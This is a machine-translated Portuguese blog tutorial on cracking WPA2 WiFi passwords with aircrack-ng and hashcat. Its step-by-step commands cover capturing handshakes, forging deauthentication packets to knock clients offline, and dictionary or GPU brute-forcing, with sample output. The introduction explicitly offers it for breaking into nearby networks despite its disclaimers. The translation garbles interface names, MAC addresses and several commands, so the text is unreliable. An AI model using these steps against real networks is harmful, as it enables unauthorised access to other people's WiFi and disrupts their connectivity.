Categories: Tutorials

Como quebrar senhas WPAWPA2 WiFi via Hashcat u0026 amp; Aircrack-ng

Neste guia, vamos ajudá-lo a descobrir como você pode crackear redes WiFi usando duas das melhores ferramentas de hacking wireless protegidas por uma senha fraca. Estaremos detalhando passo a passo como você pode hackear WPA2 usando aircrack-ng e hashcat, embora não seja exaustivo. Esta será uma informação suficiente para que os usuários testem a segurança de sua rede ou invadam uma que esteja próxima.

O ataque descrito abaixo é totalmente passivo e impossível de detectar desde que a senha que foi quebrado não vai ser usado por você. Para acelerar o processo de reconhecimento e um ataque opcional de desautenticação pode ser usado, você pode saber mais sobre isso até o final do guia.

Se de alguma forma você tem um pouco de conhecimento sobre este processo, então você não precisa saber as descrições, apenas pule para a lista de comandos que foram usados ​​na parte inferior.

Observação: mantenha uma coisa em sua mente que este tutorial é apenas para fins educacionais e não deve ser usado para qualquer atividade ilegal e o autor não é responsável por qualquer tipo de uso.

As ferramentas necessárias

  • Certifique-se de usar a linha de comando do Linux.
  • Certifique-se de ter o Kali Linux ou Kali NetHunter instalado.
  • Agora certifique-se de ter baixado e instalado o Aircrack-ng.
  • A última ferramenta de que você precisa é o hashcat.
  • John, o estripador, é uma ótima alternativa se o hashcat parar de funcionar para você.

Como quebrar senhas WPA2 com Aircrack-ng a nd Hashcat (tutorial)

Habilite o modo de monitor em seu adaptador WiFi

Você precisa começar listando as interações sem fio que suportam o modo de monitor com:

Airmon-ng

Se nenhuma interface estiver listada, então isso significa que sua placa wireless não oferece suporte ao modo monitor. Podemos assumir que o nome da interface sem fio é [protegido por e-mail], certifique-se de usar o nome correto se for diferente deste, então colocaremos a interface no modo monitor:

Airmon-ng start [email protected]

Depois disso, você precisa executar o iwconfig. Agora você poderá ver um novo modo de monitor listado como m [e-mail protegido] ou [e-mail protegido] .

Encontre seu alvo

Você precisa começar a ouvir os quadros de Beacon 802.11 que são transmitidos pelos roteadores sem fio próximos usando a interface do seu monitor:

Airodump-ng [e-mail protegido]

Você verá o seguinte resultado:

CH 13] [Decorrido: 52 s] [2021 ? 3 ? 7 16:50

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:91 : 82: F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests

14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8

14: 22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP \u0026 lt; comprimento: 0 \u0026 gt;

14: 22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK protegeu você

9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK protegeu você

00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou é o melhor

06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2

78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2

9C: 34: 26: 9F: 2E: E8-85 40 0 ​​0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT

BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK root

EC: 1A: 59: 36: AD: CA-86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Agora vamos quebrar a senha de uma rede com o nome protegida você. Você precisa se lembrar do endereço MAC BSSID, bem como do número do canal (CH), conforme exibido pelo Airodump-ng, pois precisamos de ambos para a próxima etapa.

Como capturar um Handshake de 4 vias em redes WiFi

O WPA ou WPA2 usa um handshake de 4 vias para autenticar dispositivos na rede. Você não precisa saber o que isso significa, mas você precisa capturar um desses apertos de mão para quebrar a senha da rede. Os handshakes ocorrem quando um dispositivo se conecta à rede, como quando seus vizinhos chegam em casa, podemos capturar esse handshake direcionando o airmon-ng para monitorar o tráfego no destino usando o canal, bem como os valores de bssid que vieram do último comando.

  • substitua-c e ? bssid valores pelos valores de sua rede de destino
  • -w especifica o diretório onde salvaremos a captura do pacote
  • airodump-ng-c 3 ? bssid 9C: 5C: 8E: C9: AB: C0-w. mon0
  • CH 6] [Decorrido: 1 min] [2020 ? 3 ? 13:09:16]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-47 0 140 0 0 6 54e WPA2 CCMP PSK DELL

Depois de capturar o handshake, você precisa ver algo como {WPA handshake: bc: d3: c9: ef: d2: 67 lá é o canto superior direito da tela, logo à direita da hora atual.

Se você se sentir impaciente e confortável com o uso do ataque ativo, pode forçar os dispositivos a se conectarem à rede de destino para reconectar, enviando pacotes de desautenticação maliciosos para eles. Isso resulta na captura de um handshake de 4 vias.

Assim que o handshake for capturado, você precisa pressionar ctrl-c para sair do airodump-ng. Você verá um arquivo .cap onde disse ao airodump-ng para salvar a captura chamada-01.Cap. Vamos usar este arquivo de captura para quebrar a senha da rede. Vamos renomear este arquivo para refletir o nome da rede que estamos tentando quebrar:

Mv ./-01.cap protegido você .cap

A verdadeira diversão: quebrando o PIN WPA2

A última etapa é quebrar a senha usando o aperto de mão capturado. Se você tiver acesso a uma GPU, é altamente recomendável usar o hashcat para quebrar a senha. Criamos uma ferramenta que torna o hashcat muito fácil de usar, conhecida como naïve-hashcat.

Se você não tiver acesso à GPU, poderá encontrar muitos serviços de cracking de GPU que podem ser usados ​​como o GPUHASH.me ou OnlineHashCrack. Você também pode usar o cracking da CPU com o Aircrack-ng. No entanto, se você quiser economizar tempo e usar a maior parte de sua GPU, você deve fazer overclock em sua GPU para acelerar a força bruta.

Lembre-se de que ambas as formas abaixo pressupõem uma senha bem gerada pelo usuário . Muitos dos roteadores WPA ou WPA2 vêm com uma sequência de senhas aleatórias de 12 caracteres que a maioria dos usuários não altera. Recomendamos que você use os prováveis ​​arquivos de dicionário de comprimento WPA de listas de palavras se quiser quebrar qualquer uma dessas senhas.

Usando Naive-Hashcat para fazer mágica

Antes de quebrar a senha usando o naïve-hashcat, você precisa converter o arquivo .cap para o formato de arquivo hashcat equivalente .hccapx. Isso pode ser feito rapidamente enviando o arquivo .cap para https://hashcat.net/cap2hccapx ou usando diretamente a ferramenta cap2hccapx.

Então você precisa fazer o download e executá-lo em hashcat:

# downloadgit clone https://github.com/brannondorsey/naive-hashcat

cd naive-hashcat

Baixe uma lista de palavras ou um arquivo de dicionário grande:

Lista de palavras de senhas para quebra de senhas WPA2 WiFi

Modo Hashcat para WPA/WPA2 que você precisa definir:

2500 é o modo hash de hashcat para WPA/WPA2

HASH_FILE = secureyou.hccapx POT_FILE = secureyou.pot HASH_TYPE = 2500 ./naive-hashcat .sh

O naïve-hashcat usa diferentes ataques como regra, combinação, máscara e dicionário e pode levar quase 10 dias para ser executado contra as senhas de força média. A senha quebrada é salva em hackme.pot, portanto, você precisa verificar este arquivo periodicamente. Assim que a senha for quebrada, você verá algo assim como o conteúdo do seu POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: secureyouhacking

Os dois últimos campos que foram separados por: é o nome da rede e a senha respectivamente.

Usando o Aircrack-ng para executar o ataque de dicionário

O aircrack-ng também pode ser usado para ataques de dicionário que são básicos e executados em sua CPU. Antes de executar o ataque, você precisa de uma lista de palavras. Recomendamos que você use o arquivo de dicionário rockyou infame.

Baixe o arquivo de lista de palavras do dicionário RockYou

Lembre-se de que se a senha da rede não for na lista de palavras, então você não deve quebrar a senha.

  • #-a2 especifica WPA2,-b é o BSSID,-w é o arquivo de palavras
  • aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap

Você deve veja uma mensagem CHAVE ENCONTRADA no terminal que é seguida por uma versão em texto simples da senha de rede se a senha for quebrada.

  • Aircrack-ng 2.0
  • <✓ [00:01:49] 111040 chaves testadas (102,73 k/s)
  • CHAVE ENCONTRADA! [SecuredYou-test-environment]
  • Chave mestra: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
  • 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
  • Chave transitória: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
  • 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
  • 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
  • 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
  • EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Realizando o De-authentication Attack

O ataque de des-autenticação pode enviar pacotes de des-autenticação forjados de sua máquina para o cliente conectado à rede que você está tentando crackear. Os pacotes incluem endereços de remetentes falsos que aparecem para o cliente como se tivessem sido enviados do próprio ponto de acesso. No recebimento de pacotes como esses, muitos clientes provavelmente se desconectarão da rede e se reconectarão imediatamente, fornecidos com um handshake de 4 vias, se você estiver ouvindo com airodump-ng.

Você pode usar o airodump-ng para monitorar um ponto de acesso específico (usando –c channel –bssid MAC), a menos e até que você veja um cliente (STATION) conectado. Um cliente conectado se parece quase com isto, onde 64: BC: 0C: 48: 97: F7 é o MAC do cliente.

  • CH 7] [Decorrido: 4 minutos] [2020 ? 3-08 20:24]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
  • <✓ BSSID STATION PWR Rate Lost Frames Prob
  • 9C: 5C: 8E: C9: AB : C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell

Agora você precisa deixar o airodump-ng para executar e abra um novo terminal. Usaremos um comando airplay-ng para enviar pacotes falsos de desautorização para o cliente vítima, o que o força a se reconectar à rede e, com sorte, obter um handshake no processo.

  • -0 3 especifica que gostaríamos de enviar 3 pacotes deauth. Aumente este número
  • se necessário com o risco de interromper perceptivelmente a atividade da rede do cliente
  • -a é o MAC do ponto de acesso
  • -c é o MAC do cliente
  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0

Você também pode transmitir pacotes deauth para todos os clientes conectados em uma rede sem fio usando o comando abaixo:

  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0

Assim que você enviar os pacotes deauth , você precisa voltar ao processo de airodump-ng e, se tiver sorte, você poderá ver algo assim no canto superior direito [handshake WPA: 9C: 6C: 9E: D7: 8G: C0. Agora, como o aperto de mão foi capturado, você está pronto para quebrar a senha da rede.

Versão em vídeo do tutorial

Se você é alguém que aprende assistindo alguém fazendo isso, abaixo está uma versão em vídeo para você.

Hackeando senhas WPA2 sem fio usando Aircrack-ng/Hashcat

Ferramentas alternativas de hacking sem fio que você pode usar:

  • Download grátis do Kismet-WiFi Sniffer
  • Download do Reaver WPS Pin Cracker
  • 15 Melhores ferramentas gratuitas de hacking e ferramentas de segurança para baixar.

Últimas palavras

Aviso de isenção de responsabilidade: este é apenas um simulação de como alguém pode quebrar senhas WPA2 usando ferramentas como Hashcat e Aircrack-ng. Este tipo de atividade só deve ser realizado em um ambiente controlado onde a permissão é dada. No entanto, espero que você tenha gostado deste tutorial abrangente e tenha aproveitado ao máximo.

adminguides

Share
Published by
adminguides

Recent Posts

9 maneiras de habilitar o Windows Mobility Center no Windows 11

O Windows Mobility Center ou WMC é um componente integrado do Windows que centraliza as…

2 anos ago

9 maneiras de corrigir o aplicativo Xbox que não abre no Windows 11

Aplicativo Xbox não abre no Windows 11?Os jogadores usam amplamente o aplicativo Xbox, pois permite…

2 anos ago

8 maneiras de corrigir o Microsoft Word preso ao salvar

O Microsoft Word tem um recurso de salvamento automático para tirar um instantâneo do seu…

2 anos ago

8 correções rápidas para problemas de distorção de áudio do Windows 11 durante a transmissão

Você está enfrentando problemas de distorção de áudio durante a transmissão no Windows 11?Clareza de…

2 anos ago

7 melhores maneiras de corrigir o código de erro de acesso negado 16 no Windows 11

Ao tentar visitar qualquer site no navegador, os usuários relataram enfrentar o código de erro…

2 anos ago

7 melhores correções para o mouse do Windows 11 que não funciona após o sono

O mouse ou trackpad está deixando de responder depois que seu PC com Windows sai…

2 anos ago